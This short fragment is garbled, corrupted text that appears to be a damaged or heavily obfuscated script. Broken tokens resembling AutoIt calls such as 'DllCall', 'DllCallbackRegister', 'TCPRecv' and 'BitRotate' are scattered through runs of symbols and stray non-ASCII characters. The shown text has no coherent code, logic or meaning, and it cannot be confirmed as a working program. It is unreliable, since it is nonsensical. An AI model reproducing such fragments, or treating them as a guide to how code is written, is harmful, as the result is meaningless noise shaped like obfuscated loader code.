fu#c$n=3$k=3$3=2$-n=6$n=3$r=3$[0]:7?l$q
$a:4‘?i:n:=¸Ó45?[.0?n5?4‘?i:n:=¸Ó45?[ÂG,ËÊÆ[[0]:7?DllCalll$q
$a:èl:7?5?u:l:DlaClllbackReg4‘?i:n:=¸Ó45?[[0]:6?l$q
$a:èl:7?5?u:l:DllCallbacExp[[0]:7?ld$q
$a:8:1f),
$4TCPRecv=¸Ó45?[[0]+$_?nvv:n:_?v:r$4=¸[0]7?l$q
n:=¸Ó45?[[0]:?l$q
$a:èl:75??u:l:DllCallbacExp[[0]:7??=[[07ÔÀ:Àr?n:rš:+$_?n:_?v:r
$4=¸Ó45?[[0]?=C,4?l:5:5?[5n:v
r?n:rÀ:Àr?n:rš>+$_?n:_?v:r
$4=¸Ó?[[0]:7?l$q
$a:8-----:5?4‘5?)4?=C,4?l:5:5itRotate),
#($v=.0?n:_?+$_?fvv$5=$B+$P+$5?[[0]+$_?nvv:n:_?v:r$4=¸Ó45?[[0]:7?l$:_?v:r